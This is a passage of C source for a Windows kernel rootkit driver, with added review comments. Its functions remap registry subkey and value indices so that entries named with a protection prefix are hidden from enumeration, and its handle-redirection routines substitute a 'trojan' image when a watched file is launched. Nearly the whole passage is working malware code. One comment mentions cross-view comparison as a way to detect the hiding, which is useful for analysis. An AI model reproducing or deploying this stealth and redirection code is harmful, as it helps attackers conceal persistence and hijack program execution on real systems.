if(track_reg->mRegMap)
{
memset(track_reg->mRegMap, 0, sizeof(MAP_REGVALUE));
}
}
p->mKeyData = ExAllocatePool(PagedPool, sizeof(TRACK_REGVALUE));
ASSERT(p->mKeyData)
if(p->mKeyData)
{
PTRACK_REGVALUE track_reg;
/* ______________________________________________________
. The TRACK_REGVALUE type stores a mapping of known good
. value indices to trojan indices
. ______________________________________________________ */
memset(p->mKeyData, 0, sizeof(TRACK_REGVALUE));
track_reg = ((PTRACK_REGVALUE)(p->mKeyData));
track_reg->mNumberOfValues = 0;
track_reg->mRegMap = ExAllocatePool(PagedPool, sizeof(MAP_REGVALUE));
ASSERT(track_reg->mRegMap)
if(track_reg->mRegMap)
{
memset(track_reg->mRegMap, 0, sizeof(MAP_REGVALUE));
}
}
}
}
ASSERT(p->mHandle)
ASSERT(p->mValueData)
ASSERT(p->mKeyData)
return p;
}
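/* ______________________________________________________________
 . Append one (real index -> trojan index) pair to the tail of the
 . MAP_REGVALUE list hanging off a TRACK_REGVALUE. The head node that
 . CreateNewTrackHandle() allocates is a placeholder and never holds a
 . mapping; real entries start at head->mNext. This is the common body
 . of AddRegMapValuePair() and AddRegMapKeyPair(), which previously
 . carried two identical copies of it.
 .
 . The new node is fully initialised before it is linked in, so the
 . list never contains a node with unset indices (the old code linked
 . the raw pool block first and filled it in afterwards).
 .
 . Not threadsafe: callers guarantee the owning TRACK_HANDLE is not yet
 . in the global list while it is being populated.
 .
 . Returns 1 when a node was appended, 0 when track_reg or its head is
 . NULL or the pool allocation failed (the list is left unchanged).
 . ______________________________________________________________ */
static int AppendRegMapPair( PTRACK_REGVALUE track_reg, ULONG realIndex, ULONG trojanIndex )
{
    PMAP_REGVALUE tail;
    PMAP_REGVALUE node;

    if(NULL == track_reg)
    {
        return 0;
    }
    tail = track_reg->mRegMap;
    /* we should already have the (unused) head node at this point */
    ASSERT(tail)
    if(NULL == tail)
    {
        return 0;
    }
    /* walk to the current tail of the list */
    while(tail->mNext)
    {
        tail = tail->mNext;
    }
    node = ExAllocatePool(PagedPool, sizeof(MAP_REGVALUE));
    ASSERT(node)
    if(NULL == node)
    {
        return 0;
    }
    memset(node, 0, sizeof(MAP_REGVALUE));
    node->mRealIndex = realIndex;
    node->mTrojanIndex = trojanIndex;
    /* node->mNext is NULL from the memset above; publish it as the new tail */
    DbgPrint("rootkit: adding new regmap\n");
    tail->mNext = node;
    return 1;
}

/* ______________________________________________________________
 . Record that real value index realIndex should be reported to the
 . enumerating process as trojanIndex. The pair is appended to the
 . value map (p->mValueData). Ignored when p is NULL, p is not a
 . TRACKFLAG_REGVALUE handle, or no value map has been allocated.
 .
 . Not threadsafe, make sure p isn't currently in the global list.
 . ______________________________________________________________ */
void AddRegMapValuePair( PTRACK_HANDLE p, ULONG realIndex, ULONG trojanIndex )
{
    ASSERT(p)
    DbgPrint("rootkit: AddRegMapValuePair() %d %d\n", realIndex, trojanIndex);
    if( p && (p->mType & TRACKFLAG_REGVALUE) && p->mValueData )
    {
        (void)AppendRegMapPair( (PTRACK_REGVALUE)(p->mValueData), realIndex, trojanIndex );
    }
}

/* ______________________________________________________________
 . Record that real subkey index realIndex should be reported to the
 . enumerating process as trojanIndex. The pair is appended to the
 . subkey map (p->mKeyData). Same guards and flag check as
 . AddRegMapValuePair(); only the target map differs.
 .
 . Not threadsafe, make sure p isn't currently in the global list.
 . ______________________________________________________________ */
void AddRegMapKeyPair( PTRACK_HANDLE p, ULONG realIndex, ULONG trojanIndex )
{
    ASSERT(p)
    DbgPrint("rootkit: AddRegMapKeyPair() %d %d\n", realIndex, trojanIndex);
    if( p && (p->mType & TRACKFLAG_REGVALUE) && p->mKeyData )
    {
        (void)AppendRegMapPair( (PTRACK_REGVALUE)(p->mKeyData), realIndex, trojanIndex );
    }
}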
/* ___________________________________________________________________
 . SetupFakeValueMap - build the index-translation tables for hKey.
 .
 . Called when a process is going to enumerate the subkeys/values under
 . a key, so that the hidden entries are kept track of. The key is
 . walked once with ZwEnumerateKey() and once with ZwEnumerateValueKey()
 . and, for every entry, a (real index -> trojan index) pair is recorded
 . on the TRACK_HANDLE created for hKey:
 .   - subkey pairs go to p->mKeyData   via AddRegMapKeyPair()
 .   - value  pairs go to p->mValueData via AddRegMapValuePair()
 . An entry whose name starts with gProtectStringW (a prefix compare of
 . PROTECT_STRING_LENGTH wide characters) counts as hidden: offset_index
 . is bumped and the entry is not counted toward the number to show.
 . The trojan index stored for entry i is therefore i + (number of hidden
 . entries seen so far, including i itself when i is hidden). How the
 . enumeration hook consumes these maps is not part of this file.
 .
 . Parameters:
 .   pHandle - only asserted non-NULL here; not otherwise used.
 .   hKey    - the registry key handle about to be enumerated.
 . Returns 0 on success, -1 when the scratch buffer cannot be allocated
 . (a TRACK_HANDLE may already exist for hKey at that point but is not
 . added to the global list).
 .
 . Ordering matters: the maps are filled through the AddRegMap*Pair()
 . helpers, which are not threadsafe, so the handle is only published
 . with AddNewTrackHandle() as the very last step.
 .
 . NOTE(review): this is the registry-hiding half of the rootkit. A
 . cross-view comparison (results of a live enumeration against another
 . view of the same hive) is the usual way to surface entries hidden by
 . index remapping of this kind.
 . ___________________________________________________________________ */
int SetupFakeValueMap( HANDLE pHandle, HANDLE hKey )
{
    // for enumerating a subkey
    PVOID pInfo;
    ULONG ResultLength;
    ULONG Size;
    int index = 0;          /* real index handed to the Zw* enumeration */
    int offset_index = 0;   /* number of hidden entries seen so far */
    int rc;
    int numValuesToShow = 0;
    int numSubkeysToShow = 0;
    PTRACK_HANDLE p = 0;
    ASSERT(hKey)
    ASSERT(pHandle)
    /* ___________________________________________________________
    . a new key has been opened - we need to update data about it
    . ___________________________________________________________ */
    p = FindTrackHandle(hKey);
    /* I've failed this assertion a couple of times - no crash - but weird */
    /* A stale entry means hKey was reused (or never freed) since its
     . last enumeration; it is discarded and rebuilt from scratch. */
    ASSERT(NULL == p)
    DbgPrint("rootkit: SetupFakeValueMap() with hKey 0x%X\n", hKey);
    if(p) FreeTrackHandle(hKey);
    /* May yield NULL. Every later use of p is NULL-tolerant (the
     . AddRegMap*Pair helpers check it and the final update is guarded),
     . so a failed allocation simply produces no mapping for this key. */
    p = CreateNewTrackHandle( hKey, TRACKFLAG_REGVALUE );
    /* arbitrary */
    /* NOTE(review): 216 bytes must hold the KEY_BASIC_INFORMATION /
     . KEY_VALUE_BASIC_INFORMATION header plus the entry name. Both loops
     . below treat any status other than STATUS_SUCCESS as end of
     . enumeration, so an entry whose name does not fit (the call then
     . reports the required size in ResultLength rather than succeeding)
     . ends the walk early and later entries get no mapping. Confirm
     . against the hook that consumes these maps before relying on it. */
    Size = 216;
    pInfo = ExAllocatePool(PagedPool, Size);
    if (pInfo == NULL)
    {
        return -1;
    }
    /* _________________________________
    . enumerate subkeys
    . _________________________________ */
    for(;;)
    {
        rc = ZwEnumerateKey(
            hKey,
            index,
            KeyBasicInformation,
            pInfo,
            Size,
            &ResultLength);
        if( STATUS_SUCCESS == rc )
        {
            DbgPrint("rootkit: enum subkey index %d\n", index);
            /* __________________________________________
            . compare subkey name to our predefined
            . protection string. If it matches, then
            . make sure we have a trojan mapping for it.
            . offset_index keeps track of subkey indexes
            . that we have "skipped".
            . NOTE(review): Name is a counted buffer (NameLength), not a
            . NUL-terminated string; the prefix compare below relies on
            . the name being at least PROTECT_STRING_LENGTH characters
            . or on a mismatch occurring before the end of it.
            . __________________________________________ */
            if( !wcsncmp(
                ((KEY_BASIC_INFORMATION *)pInfo)->Name,
                gProtectStringW,
                PROTECT_STRING_LENGTH))
            {
                /* gProtectString is presumably the narrow twin of
                 . gProtectStringW, used here only for the debug print */
                DbgPrint("rootkit: detected protected subkey %s\n", gProtectString);
                offset_index++;
            }
            else
            {
                numSubkeysToShow++;
            }
            /* a pair is recorded for every entry, hidden or not */
            AddRegMapKeyPair( p, index, (index + offset_index));
            index++;
        }
        else
        {
            /* any non-success status (including "no more entries" and
             . buffer-too-small) ends the subkey walk */
            DbgPrint("rootkit: error %X\n", rc);
            break;
        }
    }
    index = 0;
    offset_index = 0;
    /* _________________________________
    . enumerate values
    . _________________________________ */
    for(;;)
    {
        rc = ZwEnumerateValueKey(
            hKey,
            index,
            KeyValueBasicInformation,
            pInfo,
            Size,
            &ResultLength);
        if( STATUS_SUCCESS == rc )
        {
            DbgPrint("rootkit: enum value index %d\n", index);
            /* __________________________________________
            . compare value name to our predefined
            . protection string. If it matches, then
            . make sure we have a trojan mapping for it.
            . offset_index keeps track of value indexes
            . that we have "skipped".
            . __________________________________________ */
            if( !wcsncmp(
                ((KEY_VALUE_BASIC_INFORMATION *)pInfo)->Name,
                gProtectStringW,
                PROTECT_STRING_LENGTH))
            {
                DbgPrint("rootkit: detected protected value %s\n", gProtectString);
                offset_index++;
            }
            else
            {
                numValuesToShow++;
            }
            /* a pair is recorded for every entry, hidden or not */
            AddRegMapValuePair( p, index, (index + offset_index));
            index++;
        }
        else
        {
            /* any non-success status ends the value walk */
            DbgPrint("rootkit: error %X\n", rc);
            break;
        }
    }
    ExFreePool((PVOID)pInfo);
    /* update data about this handle */
    /* Store the visible (non-hidden) counts on each map, then publish
     . the handle. Nothing after AddNewTrackHandle() may touch p, since
     . the AddRegMap*Pair helpers are not safe once it is in the list. */
    if(p)
    {
        PTRACK_REGVALUE track_reg = ((PTRACK_REGVALUE)(p->mValueData));
        DbgPrint("rootkit: adding track value!\n");
        if(track_reg)
        {
            track_reg->mNumberOfValues = numValuesToShow;
        }
        track_reg = ((PTRACK_REGVALUE)(p->mKeyData));
        if(track_reg)
        {
            /* mNumberOfValues doubles as the subkey count on the key map */
            track_reg->mNumberOfValues = numSubkeysToShow;
        }
        AddNewTrackHandle(p);
    }
    return 0;
}
/* ____________________________________________
 . Handle-redirection state shared by WatchProcessHandle(),
 . CheckForRedirectedFile() and SetTrojanRedirectFile():
 .   gFileHandle         - the caller-supplied handle being watched
 .   gRedirectFileHandle - the handle opened on the substitute image
 .   gSectionHandle / gRedirectSectionHandle - declared here but not
 .                         referenced in this part of the file
 . NOTE(review): all four are plain globals read and written without
 . any locking visible here.
 . ____________________________________________ */
HANDLE gFileHandle            = NULL;
HANDLE gRedirectFileHandle    = NULL;
HANDLE gSectionHandle         = NULL;
HANDLE gRedirectSectionHandle = NULL;
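/* ____________________________________________
 . Watch this file handle - if they attempt to launch a process from
 . it, CheckForRedirectedFile() hands back the substitute handle opened
 . here instead.
 .
 . The substitute image is hard-wired to \??\C:\calc.exe, which the
 . original author marks as a test image. It is opened for read and
 . execute with FILE_OPEN (it must already exist) and stored through
 . SetTrojanRedirectFile(); only then is theFileH recorded in
 . gFileHandle. On an open failure nothing is recorded and the previous
 . redirect state is left untouched.
 .
 . NOTE(review): a substitute handle opened by an earlier call is never
 . closed - SetTrojanRedirectFile() simply overwrites the global.
 . NOTE(review): handle values are per-process, so matching theFileH by
 . value alone (see CheckForRedirectedFile) can collide with an unrelated
 . handle in another process; presumably the hook that calls this keeps
 . the same process context - confirm.
 . ____________________________________________ */
void WatchProcessHandle( HANDLE theFileH )
{
    NTSTATUS rc;
    HANDLE hFile = NULL;
    OBJECT_ATTRIBUTES ObjectAttr;
    UNICODE_STRING FileName;
    IO_STATUS_BLOCK ioStatusBlock;

    DbgPrint("rootkit: Loading Trojan File Image\n");
    /* first open file w/ NtCreateFile
    . this works for a Win32 image.
    . calc.exe is just for testing.
    */
    RtlInitUnicodeString(&FileName, L"\\??\\C:\\calc.exe");
    InitializeObjectAttributes( &ObjectAttr,
        &FileName,
        OBJ_CASE_INSENSITIVE,
        NULL,
        NULL);
    rc = ZwCreateFile(
        &hFile,
        GENERIC_READ | GENERIC_EXECUTE,
        &ObjectAttr,
        &ioStatusBlock,
        NULL,                   /* AllocationSize is a PLARGE_INTEGER and is
                                 . ignored for FILE_OPEN; the previous code
                                 . passed the address of a ULONG here */
        FILE_ATTRIBUTE_NORMAL,
        FILE_SHARE_READ,
        FILE_OPEN,
        0,
        NULL,
        0);
    if (rc != STATUS_SUCCESS)
    {
        DbgPrint("Unable to open file, rc=%x\n", rc);
        /* void function: the previous version returned a value here */
        return;
    }
    SetTrojanRedirectFile( hFile );
    gFileHandle = theFileH;
}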
/* ____________________________________________
 . Return the substitute handle recorded by WatchProcessHandle() when
 . hFile is the watched handle, NULL for any other handle. The match is
 . a raw value comparison against gFileHandle; note that when nothing is
 . being watched (gFileHandle still 0) a NULL hFile compares equal and
 . whatever gRedirectFileHandle holds is returned.
 . ____________________________________________ */
HANDLE CheckForRedirectedFile( HANDLE hFile )
{
    HANDLE substitute = NULL;

    if(gFileHandle == hFile)
    {
        substitute = gRedirectFileHandle;
        DbgPrint("rootkit: Found redirected filehandle - from %x to %x\n", hFile, substitute);
    }
    return substitute;
}
/* ____________________________________________
 . Record hFile as the handle CheckForRedirectedFile() hands back in
 . place of the watched one. The global is simply overwritten: no
 . validation of hFile and no close of a previously stored handle.
 . ____________________________________________ */
void SetTrojanRedirectFile( HANDLE hFile ) {
    gRedirectFileHandle = hFile;
}